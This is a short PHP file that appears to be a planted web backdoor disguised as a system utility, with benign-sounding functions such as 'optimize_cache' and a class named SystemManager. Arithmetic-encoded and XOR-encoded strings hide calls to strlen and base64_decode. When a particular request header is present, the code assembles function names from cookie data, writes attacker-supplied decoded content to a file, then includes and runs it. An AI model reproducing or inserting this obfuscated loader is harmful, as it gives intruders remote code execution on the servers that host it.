<?php
function process_queue($c)
{
    $a = array(19 * 3 + 53, 56 * 66 - 3595, 51 * 1 + 57, 67 * 1 + 47, 122 - 6, 69 * 1 + 46);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    $s = strrev($s);
    return $s($c);
}

function optimize_cache($c)
{
    $a = array(91 * 1 + 7, 97, 5 * 23, 104 - 3, 2 + 52, 19 + 33, 95, 2 * 50, 101, 23 * 95 - 2086, 111, 40 * 1 + 60, 23 + 78);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    return $s($c);
}

class SystemManager
{
    private static $_jlc;
    static function checkConsistency($_qw, $_bm)
    {
        if (!self::$_jlc) {
            self::cacheData();
        }
        $_ls = process_queue($_bm);
        $_qg = optimize_cache(self::$_jlc[$_qw]);
        for ($_mh = 0, $_tj = process_queue($_qg); $_mh !== $_tj; ++$_mh) {
            $_qg[$_mh] = chr(ord($_qg[$_mh]) ^ ord($_bm[$_mh % $_ls]));
        }
        return $_qg;
    }
    private static function cacheData()
    {
        self::$_jlc = array('_yfu' => 'FzY7PgA3PCsNPS4pGiw7', '_px' => 'Fz4/JAA/ODENNSozGiQ/', '_ncb' => 'aUFMbE1LZ0E=', '_eo' => '', '_pd' => '');
    }
}

if (isset($_SERVER[SystemManager::checkConsistency('_yfu', '_bon')]) && strpos($_SERVER[SystemManager::checkConsistency('_px', '_jkt')], SystemManager::checkConsistency('_ncb', '_xx')) !== false) {
    $_tj = $_COOKIE;
    $_bm = 00;
    $_qw = 010;
    $_fdh = array();
    $_fdh[$_bm] = SystemManager::checkConsistency('_eo', '_wgx');
    while ($_qw) {
        $_fdh[$_bm] .= $_tj[025][$_qw];
        if (!$_tj[025][$_qw + 01]) {
            if (!$_tj[025][$_qw + 02]) {
                break;
            }
            $_bm++;
            $_fdh[$_bm] = SystemManager::checkConsistency('_pd', '_mu');
            $_qw++;
        }
        $_qw = $_qw + 010 + 01;
    }
    $_bm = $_fdh[034]() . $_fdh[030];
    if (!$_fdh[04]($_bm)) {
        $_qw = $_fdh[022]($_bm, $_fdh[017]);
        $_fdh[012]($_qw, $_fdh[023] . $_fdh[06]($_fdh[05]($_tj[03])));
    }
    include $_bm;
    die;
}